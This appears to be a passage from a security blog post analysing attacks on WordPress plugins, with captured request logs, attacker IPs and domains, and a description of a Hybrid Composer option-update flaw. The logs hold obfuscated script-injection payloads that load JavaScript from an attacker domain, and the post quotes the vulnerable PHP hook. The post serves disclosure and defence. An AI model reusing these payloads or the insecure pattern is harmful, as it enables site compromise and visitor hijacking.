192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019:] "POST /wp-admin/admin-post.php HTTP/1.1"

FoldersFolders

 

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Staff List

 

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

Mobile App

 

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

 
 
 

Malicious Domains and IPs:

 

IPs:

192.169.157.142
185.225.16.152
178.128.57.173
185.238.0.146
185.238.0.135
45.12.32.55 
185.238.0.133
185.238.0.132
45.12.32.56
185.238.0.146
45.67.229.126
192.232.194.4

 
 

Domains Injected:

 

  • greatfacebookpage[.]com
  • greatinstagrampage[.]com
  • destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

WPTF Hybrid Composer – Unauthenticated Arbitrary Options Update

With almost 300 installs, WPTF - Hybrid Composer is a framework that helps users easily create custom themes for WordPress. We recently noticed an increase in suspicious requests, revealing an attack against this plugin.

Easily automated vulnerabilities are the first choice for bad actors. The following snippet provides a good example why attackers would target it:

function hc_ajax_save_option() {
    echo update_option($_POST['option_name'], $_POST['content']);
    die();
}

add_action('wp_ajax_nopriv_hc_ajax_save_option', 'hc_ajax_save_option');

The function “hc_ajax_save_option” uses the WordPress update_option(), along with two parameters that come directly from user input. Because the developers define “hc_ajax_save_option” as a non-private hook action, unauthenticated bad actors can obtain full access.

For those who doesn’t know, WordPress’ update_option() function is used to update any option in the options database table. Using this function, an attacker can gain admin access or inject arbitrary data into any site using vulnerable versions of this framework, 1.4.6 and lower.

The developer is aware of this vulnerability. This vulnerability was patched in a recent update, and we strongly encourage users to update their plugin if they haven’t already